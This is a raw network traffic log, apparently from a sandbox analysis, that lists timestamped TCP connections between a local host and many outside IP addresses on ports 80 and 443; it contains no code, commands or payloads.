                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074434042 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074445963 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074472904 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.074491978 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076045036 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076071024 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076097965 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.076117039 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.152503014 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.152523041 CET8056873199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.152600050 CET5687380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.393816948 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.393903017 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399235010 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399285078 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399302959 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399338961 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399343014 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399398088 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399434090 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399447918 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399451971 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399485111 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399487972 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399529934 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399588108 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399590969 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399640083 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.399971008 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400016069 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400019884 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400053024 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400867939 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400906086 CET44356880188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400914907 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.400950909 CET56880443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.410044909 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.413921118 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.415086985 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.419198990 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.532752037 CET805688885.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.532825947 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.532901049 CET5688880192.168.2.985.17.31.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.537852049 CET805688885.17.31.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.747898102 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748013973 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748049974 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.748111010 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.754924059 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.754966974 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.755052090 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.756606102 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.756616116 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.766338110 CET8056884154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:40.766397953 CET5688480192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.185524940 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.185657978 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187484026 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187500000 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187829971 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.187946081 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.188251972 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.231332064 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957185030 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957228899 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957254887 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957284927 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957309008 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957309961 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957334995 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957353115 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957353115 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957361937 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957400084 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957458019 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957458019 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957463980 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.957588911 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977129936 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977184057 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977343082 CET44356896188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977359056 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:41.977543116 CET56896443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.040577888 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.045425892 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.045480013 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.060307980 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.065283060 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.480381012 CET805690513.248.169.48192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.480433941 CET5690580192.168.2.913.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.540710926 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.545840979 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.545909882 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.547264099 CET5691180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.552128077 CET8056911188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.657013893 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663484097 CET80569123.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663553953 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663829088 CET5691280192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.665271997 CET5691380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.669891119 CET80569123.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.649502039 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.731123924 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.731177092 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.799997091 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.800072908 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.863894939 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.865145922 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.914921045 CET8056874199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:48.917268038 CET5687480192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.011537075 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.011612892 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.099286079 CET5696580192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.103461981 CET5696480192.168.2.9103.224.212.210
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.104259968 CET805696544.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.105601072 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.105906010 CET5696780192.168.2.9103.224.182.252
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.109339952 CET8056964103.224.212.210192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.111805916 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.111818075 CET8056967103.224.182.252192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.390928030 CET8056966154.85.183.50192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.390994072 CET5696680192.168.2.9154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.428781986 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433681011 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433744907 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.433974028 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.439002037 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.443607092 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449345112 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449448109 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449634075 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.454659939 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896653891 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896755934 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896775961 CET8056977199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896811008 CET5697780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115219116 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115287066 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115292072 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115305901 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115324020 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115331888 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115335941 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115348101 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115354061 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115355015 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115360975 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115366936 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115372896 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115417004 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120240927 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120286942 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120302916 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120345116 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203627110 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203643084 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203649998 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203665972 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203677893 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203701019 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203748941 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203982115 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.203999043 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204010010 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204037905 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204067945 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204160929 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204174042 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204220057 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204235077 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204792976 CET805697664.190.63.136192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.204838037 CET5697680192.168.2.964.190.63.136
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.769994020 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.774975061 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.775046110 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.775305986 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.780050993 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.102668047 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.107783079 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.108158112 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.127825975 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.132657051 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.324832916 CET804926964.225.91.73192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.325140953 CET4926980192.168.2.964.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.611483097 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.613162994 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.689541101 CET4927680192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.694693089 CET804927672.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.861460924 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.866358995 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.869091988 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.094928980 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.099808931 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.362453938 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.362515926 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.362600088 CET4927780192.168.2.972.52.179.174
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.367428064 CET804927772.52.179.174192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.224805117 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230580091 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230674028 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230922937 CET5597380192.168.2.952.34.198.229
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.236394882 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.944458961 CET805597352.34.198.229192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.345944881 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.346772909 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.346848011 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.427112103 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.427246094 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.427988052 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.428050995 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429256916 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429266930 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429311037 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429312944 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429338932 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429352045 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429363012 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429398060 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429403067 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.429441929 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.430057049 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.430116892 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522537947 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522583008 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522608042 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522627115 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522646904 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.522665977 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523288012 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523329020 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523350954 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523358107 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523387909 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523407936 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523411989 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523456097 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523500919 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523509979 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523653030 CET54964443192.168.2.999.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.523669958 CET4435496499.83.170.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969259024 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969307899 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969316959 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969341040 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969353914 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969382048 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969387054 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969392061 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969412088 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969434023 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969439030 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969470024 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969480038 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969485044 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969501972 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969523907 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969527960 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969557047 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969856977 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969903946 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.969917059 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970005035 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970019102 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970035076 CET44354965188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970056057 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.970071077 CET54965443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:01.995275021 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.000319958 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.366235018 CET8056865188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.366358042 CET5686580192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373406887 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373437881 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373574018 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373804092 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.373812914 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.816106081 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.816232920 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818154097 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818161964 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818418980 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818479061 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.818918943 CET54978443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:02.863334894 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669182062 CET44354978188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.669249058 CET44354978188.114.96.3192.168.2.9
